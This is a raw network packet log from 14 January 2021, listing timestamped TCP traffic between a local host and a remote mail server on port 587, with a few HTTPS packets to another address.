Jan 14, 2021 08:01:13.513997078 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.704309940 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.704760075 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.705652952 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.706052065 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.895365953 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.895526886 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.895847082 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.899916887 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.900479078 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.087682009 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.088027000 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.090406895 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.093739986 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.094137907 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.279396057 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.281205893 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.283047915 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.284687042 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.319204092 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.322000980 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.474591017 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.475183010 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.512569904 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.513155937 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.513783932 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.514072895 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.514251947 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.514539957 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.514776945 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.514930010 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.515517950 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.665265083 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.665503979 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.665534019 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.665611029 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.667076111 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.667812109 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.703716993 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.703815937 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.703944921 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.703980923 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.704678059 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.704699993 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.704792976 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.704884052 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.705034018 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.705415964 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.705526114 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.705542088 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.857176065 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.857415915 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.858100891 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.858577013 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.862601042 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.894071102 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.894237041 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.894900084 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.894917965 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.894925117 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.895041943 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.895188093 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:14.895395994 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:14.895473957 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.052750111 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.054549932 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.055154085 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.084254026 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.084894896 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.084994078 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.085009098 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.085095882 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.085154057 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.085223913 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.085412025 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.086282015 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.150774002 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.151665926 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.246455908 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.249955893 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.250499010 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279069901 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.279294968 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279443026 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.279460907 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.279562950 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279608965 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279659986 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279779911 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279882908 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.279985905 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280082941 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280191898 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280292034 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280395031 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.280400991 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280471087 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.280514002 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280642033 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280658960 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.280771971 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.280867100 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.281055927 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.281147957 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.341043949 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.341852903 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.341938019 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.342045069 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.342133999 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.440651894 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.442363024 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.442768097 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.469435930 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469455004 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469461918 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469469070 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469557047 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469593048 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469604969 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469708920 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469834089 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469846010 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.469986916 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470109940 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470230103 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470312119 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470428944 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470630884 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470789909 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.470909119 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.482918978 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.531079054 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.534230947 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.534540892 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.633240938 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.666091919 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.666520119 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.724713087 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.726432085 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.726715088 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.856789112 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.857358932 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.858145952 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.858263016 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.858445883 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.858710051 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.858886957 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.859029055 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.859234095 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.859366894 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:15.916903973 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:15.917440891 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.048351049 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.048381090 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.048794031 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.049022913 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.049155951 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.049257994 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.058851957 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.059693098 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.107762098 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.107796907 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.107867002 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.107927084 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.110858917 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.111556053 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.250134945 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.251336098 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.251368999 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.251491070 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.252065897 CET	49792	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.303977966 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.304009914 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.304027081 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.304044008 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.304435015 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.437994003 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:01:16.442747116 CET	587	49792	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.486991882 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:01:16.487133026 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:01:16.498416901 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.500509024 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.500904083 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.691168070 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.694730043 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.695071936 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:16.885198116 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.890110970 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:16.890662909 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.082516909 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.104408979 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.104765892 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.294995070 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.295687914 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.296221972 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296329975 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296437979 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296545982 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296658039 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296854019 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.296952963 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.306162119 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486269951 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.486294985 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.486366034 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486501932 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.486568928 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486618042 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.486686945 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486697912 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486741066 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.486805916 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486824036 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.486958981 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.487023115 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.487725973 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.496792078 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.496893883 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.678967953 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.679168940 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.679404974 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.679410934 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.679425955 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.679440975 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.679549932 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.679573059 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.679848909 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.679934025 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.680100918 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.680627108 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.680701971 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.690021038 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.690251112 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.869379044 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.869450092 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.869488001 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.869667053 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.870023012 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.870707035 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.871284962 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.871391058 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:17.880316019 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.880609989 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:17.880868912 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.062683105 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.062714100 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.062735081 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.062860966 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.062921047 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.062956095 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.062997103 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063075066 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063124895 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063189983 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063219070 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063348055 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063376904 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063411951 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063422918 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063430071 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.063505888 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063621998 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063735962 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063849926 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.063961029 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.064069986 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.064213037 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.064327002 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.064455032 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.064583063 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.066366911 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.066796064 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.067044973 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.067298889 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.072803020 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.073514938 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.114552975 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.228477955 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.253170967 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253252029 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253278017 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253304005 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253447056 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253480911 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253580093 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253604889 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253684998 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253813028 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253839970 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.253931999 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.254127026 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.254209995 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.254367113 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.254525900 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.256355047 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.256779909 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.256885052 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.257219076 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.263643980 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.263943911 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.263972998 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.264055967 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.264256954 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.266216993 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.267421007 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.304609060 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.304900885 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.304999113 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.312545061 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.419358969 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.419560909 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.456370115 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.456448078 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.457468987 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.458430052 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.459222078 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.612931967 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.613706112 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.649513960 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.652913094 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.654175043 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.804208040 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.804374933 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.804801941 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.844394922 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.846857071 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.847453117 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:18.999006033 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:18.999787092 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.040627956 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.045588970 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.046148062 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.190927982 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.190968037 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.191082954 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.194612026 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.195399046 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.197107077 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.236345053 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.289082050 CET	587	49795	199.193.7.228	192.168.2.3
